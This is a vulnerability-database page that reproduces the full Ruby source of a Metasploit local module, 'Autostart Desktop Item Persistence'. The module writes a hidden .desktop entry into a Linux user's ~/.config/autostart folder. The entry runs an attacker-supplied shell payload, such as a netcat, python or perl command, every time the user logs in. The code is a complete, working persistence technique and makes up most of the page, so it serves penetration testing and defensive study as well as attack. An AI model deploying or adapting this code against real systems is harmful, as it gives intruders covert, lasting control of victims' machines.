Lucene search
K

Autostart Desktop Item Persistence

🗓️ 17 Aug 2018 06:24:28Reported by Eliott TeissonniereType 
metasploit
 metasploit
🔗 www.rapid7.com👁 15 Views

Autostart Desktop Item Persistence module creates an autostart entry to execute a payload, running when the user logs in

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Autostart Desktop Item Persistence',
      'Description'    => %q(
        This module will create an autostart entry to execute a payload.
        The payload will be executed when the users logs in.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Eliott Teissonniere' ],
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
        'BadChars'   => '#%\n"',
        'Compat'     => {
          'PayloadType'  => 'cmd',
          'RequiredCmd'  => 'generic python netcat perl'
        }
      },
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
      'DisclosureDate' => '2006-02-13', # Date of the 0.5 doc for autostart
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0
    ))

    register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
  end

  def exploit
    name = datastore['NAME'] || Rex::Text.rand_text_alpha(5)

    home = cmd_exec('echo ~')

    path = "#{home}/.config/autostart/#{name}.desktop"

    print_status('Making sure the autostart directory exists')
    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists

    print_status("Uploading autostart file #{path}")

    write_file(path, [
      "[Desktop Entry]",
      "Type=Application",
      "Name=#{name}",
      "NoDisplay=true",
      "Terminal=false",
      "Exec=/bin/sh -c \"#{payload.encoded}\""
    ].join("\n"))
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.1Low risk
Vulners AI Score0.1
15